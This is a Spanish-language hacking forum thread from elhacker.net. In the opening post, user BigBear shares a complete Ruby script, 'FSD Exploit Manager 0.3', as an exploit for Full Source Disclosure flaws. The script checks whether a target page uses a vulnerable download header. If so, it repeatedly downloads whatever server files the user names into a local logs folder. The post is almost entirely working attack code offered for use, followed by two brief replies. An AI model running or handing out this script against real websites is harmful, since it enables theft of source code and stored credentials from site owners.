elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Ruby] FSD Exploit Manager 0.3		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ruby] FSD Exploit Manager 0.3  (Leído 1,405 veces)
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
[Ruby] FSD Exploit Manager 0.3
« en: 4 Septiembre 2015, 23:01 pm »
Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure.

El codigo :

Código
  1. #!usr/bin/ruby
  2. #FSD Exploit Manager 0.3
  3.  
  4. require "open-uri"
  5. require "net/http"  
  6.  
  7. # Functions 
  8.  
  9. def toma(web)
  10. 	begin
  11. 		return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  12. 	rescue
  13. 		return "Error"
  14. 	end
  15. end
  16.  
  17. def uso 
  18. 	print "\n[+] Sintax : ruby locateip.rb <target>\n"
  19. end
  20.  
  21. def  head
  22. 	print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
  23. end
  24.  
  25. def copyright
  26. 	print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  27. 	exit(1)
  28. end
  29.  
  30. def installer
  31. 	if not Dir.exists?("logs")
  32. 		Dir.mkdir "logs"
  33. 	end
  34. 	Dir.chdir("logs")
  35. end
  36.  
  37. def download(file,name)
  38. 	File.open(name, "wb") do |saved_file|
  39. 		open(file, "rb") do |read_file|
  40. 			saved_file.write(read_file.read)
  41. 		end
  42. 	end
  43. end
  44.  
  45. def scan_fsd(target)
  46. 	print "\n[+] Scanning ...\n\n"
  47. 	path = File.basename(URI(target).path)
  48. 	code = toma(target+path)
  49. 	if code=~/header\((.*)Content-Disposition: attachment;/
  50. 		print "[+] Vulnerable !\n"
  51. 		while(1)
  52. 			print "\n[+] Insert Filename : "
  53. 			filename = STDIN.gets.chomp
  54. 			if filename=="exit"
  55. 				copyright()
  56. 			else
  57. 				download(target+filename,filename)
  58. 				print "\n[+] Downloaded !\n"
  59. 			end
  60. 		end
  61.  
  62. 	else
  63. 		print "[-] Not vulnerable\n"
  64. 	end
  65. end
  66.  
  67. target = ARGV[0]
  68.  
  69. installer()
  70.  
  71. head()
  72.  
  73. if !target
  74. 	uso()
  75. else
  76. 	scan_fsd(target)
  77. end
  78.  
  79. copyright()
  80.  
  81. #The End ?
  82.  

Eso es todo.
En línea
DeMoNcRaZy


Desconectado Desconectado

Mensajes: 420


$~*|_


Ver Perfil
Re: [Ruby] FSD Exploit Manager 0.3
« Respuesta #1 en: 4 Septiembre 2015, 23:10 pm »
Buenas,

¿Podría explicar cuál es su utilidad?
Nunca he trabajado con exploit y siento curiosidad.

Cualquier información adicional lo agradecería.

Saludos.
En línea
Esta página web no está disponible - Google Chrome
BigBear


Desconectado Desconectado

Mensajes: 545



Ver Perfil
Re: [Ruby] FSD Exploit Manager 0.3
« Respuesta #2 en: 4 Septiembre 2015, 23:42 pm »
Aca hice un manual que habla sobre las vulnerabilidades mas comunes y tambien incluye FSD.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Introducing Ruby] Lo que debes saber sobre Ruby
Scripting 		RyogiShiki 0 9,620 Último mensaje 4 Marzo 2011, 20:45 pm
por RyogiShiki
[Perl] FSD Exploit Manager
Scripting 		BigBear 0 1,841 Último mensaje 7 Octubre 2011, 01:14 am
por BigBear
[Exploit] me sale errror al intentar compilar el exploit half-nelson
Bugs y Exploits 		moikano→@ 6 10,805 Último mensaje 24 Noviembre 2011, 22:46 pm
por moikano→@
[Perl] Exploit DB Manager 0.6
Scripting 		BigBear 0 9,998 Último mensaje 13 Febrero 2015, 17:43 pm
por BigBear
[Perl] FSD Exploit Manager 0.6
Scripting 		BigBear 0 1,662 Último mensaje 20 Febrero 2015, 17:30 pm
por BigBear
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines